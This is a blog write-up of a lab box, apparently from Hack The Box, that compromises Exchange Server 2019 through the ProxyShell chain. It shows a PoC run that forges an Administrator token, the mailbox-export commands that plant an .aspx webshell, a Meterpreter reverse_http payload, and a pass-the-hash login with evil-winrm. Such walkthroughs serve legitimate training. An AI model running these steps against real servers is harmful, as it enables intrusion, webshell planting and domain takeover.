Myles Nieman
← All writeups

Logonshell

Overview

Logonshell is a very easy Windows box hosting Microsoft Exchange Server 2019 RTM (version 15.2.221.12) on the domain edelweiss.htb. The Exchange stack is vulnerable to ProxyShell (CVE-2021-34473 / CVE-2021-34523 / CVE-2021-31207) — a chain of an SSRF authentication bypass, privilege elevation, and a post-auth arbitrary file write that together yield pre-authenticated RCE. The auth bypass generates a valid session token for Administrator@edelweiss.htb, and a Metasploit exploit module drops a Meterpreter shell. The recovered NTLM hash for Administrator is then used with evil-winrm for a stable session.

Path: Exchange 2019 RTM → ProxyShell auth bypass → impersonation token → Meterpreter shell → evil-winrm (pass-the-hash) → Administrator.

Enumeration

The target exposes a large number of ports consistent with an Exchange server acting as a domain controller.

$ nmap 10.129.227.141 -sV
PORT     STATE SERVICE
25/tcp   open  smtp
53/tcp   open  domain
80/tcp   open  http
81/tcp   open  hosts2-ns
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
443/tcp  open  https
444/tcp  open  snpp
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
465/tcp  open  smtps
587/tcp  open  submission
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
808/tcp  open  ccproxy-http
1801/tcp open  msmq
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl

Nmap initial port scan results

Browsing to https://10.129.227.141/owa/auth/logon.aspx confirms an Outlook Web Access login page with a 2011 Microsoft copyright, suggesting Exchange 2010 era styling — but the exchange_proxyshell.py script clarifies the actual version:

$ python3 exchange_proxyshell.py -u https://10.129.227.141
[+] Exchange Backend Servers: ['dc.edelweiss.htb']
[+]     dc.edelweiss.htb - version: 15.2.221.12
[+]     dc.edelweiss.htb - version_short: Exchange Server 2019 RTM
[+]     dc.edelweiss.htb - user: NT AUTHORITY\SYSTEM

The domain is edelweiss.htb, the server is dc.edelweiss.htb, and the Exchange version is 15.2.221.12 (Exchange Server 2019 RTM) — squarely in the ProxyShell-vulnerable range. The script also enumerates SMTP domains (edelweiss.htb, htb.) and surfaces the Administrator LegacyDN, setting up the SID lookup step.

Foothold — ProxyShell (CVE-2021-34473)

ProxyLogon and a Metasploit ProxyShell module were tried first but both failed to obtain a usable shell:

Metasploit ProxyShell module failure

Metasploit ProxyLogon RCE failure

The exchange_proxyshell.py PoC from horizon3ai/proxyshell provides more control. It successfully enumerates users from Active Directory (including Administrator, Guest, krbtgt, anakin, and Exchange service accounts), walks the SID-lookup chain to resolve Administrator@edelweiss.htb to SID S-1-5-21-1677581083-3380853377-188903654-500, and generates a forged EWS impersonation token:

$ python3 exchange_proxyshell.py -u https://10.129.227.141
[+] Retrieved LegacyDN: /o=EDELWEISS/ou=Exchange Administrative Group .../cn=...Administrator
[+] Generated token for Administrator@edelweiss.htb - S-1-5-21-...-500
[+] Token: VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9z...
PS>

The resulting PowerShell session runs constrained commands. Using the New-ManagementRoleAssignment cmdlet grants the Mailbox Import Export role:

PS> New-ManagementRoleAssignment -Role "Mailbox Import Export" -User Administrator@edelweiss.htb
PS> New-MailboxExportRequest -Mailbox Administrator@edelweiss.htb -IncludeFolders "#Drafts#" `
      -FilePath "C:\inetpub\wwwroot\aspnet_client\svjavxjxjjaqoyik.aspx" `
      -ContentFilter "Subject -eq 'svjavxjxjjaqoyik'"

The webshell is written to the aspnet_client directory via the mailbox export mechanism. Switching the Metasploit payload to windows/x64/meterpreter/reverse_http and pointing the exploit at the placed webshell delivers a session:

Webshell confirmed written to disk during the export process

Metasploit session opens with the corrected payload

Meterpreter session active on the Exchange server

The Meterpreter session showed instability with the chosen payload:

Meterpreter session instability noted

Root

Rather than troubleshoot the Meterpreter session, the Administrator NTLM hash is recovered from the session and used to authenticate directly via evil-winrm:

$ evil-winrm -u Administrator -H f6b0de9c3fcb4522a273263d4adbfb16 -i edelweiss.htb

evil-winrm session as Administrator on edelweiss.htb

Domain Administrator access achieved.

Takeaways

  • ProxyShell (CVE-2021-34473/34523/31207) chains an unauthenticated SSRF with privilege elevation and a post-auth file write, making any unpatched internet-facing Exchange instance a pre-auth RCE target. Patch immediately or take Exchange off public exposure.
  • The mailbox export-to-webshell technique is a hallmark of ProxyShell exploitation — even when direct Meterpreter sessions are unstable, the recovered NTLM hash from the compromised session is sufficient for pass-the-hash via evil-winrm.